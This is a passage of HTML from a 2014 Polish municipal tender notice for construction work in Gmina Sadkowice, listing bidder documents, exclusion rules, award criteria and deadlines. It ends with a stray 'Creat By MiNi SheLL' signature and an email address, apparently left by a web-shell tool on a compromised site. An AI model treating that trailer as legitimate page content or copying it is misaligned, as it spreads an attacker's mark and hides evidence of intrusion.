<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.1 Formularz Oferty - sporządzony zgodnie z formularzem załączonym do specyfikacji istotnych warunków zamówienia (Załącznik nr 1) podpisany przez Wykonawcę lub osobę umocowaną przez Wykonawcę.
1.2 Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą cenę zamówienia - sporządzony na formularzach kosztorysu ofertowego (Załączniki nr  2)
1.3 Dowód wniesienia wadium (kopia dokumentu potwierdzająca wniesienie wadium).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje zmianę terminu wykonania przedmiotu zamówienia pod warunkiem wystąpienia:
a). siły wyższej w rozumieniu Kodeksu Cywilnego jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia
2. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminasadkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sadkowicach, Sadkowice 129A, 96-206 Sadkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2014 godzina 10:00, miejsce: Urząd Gminy w Sadkowicach, Sadkowice 129A, 96-206 Sadkowice, pok. nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com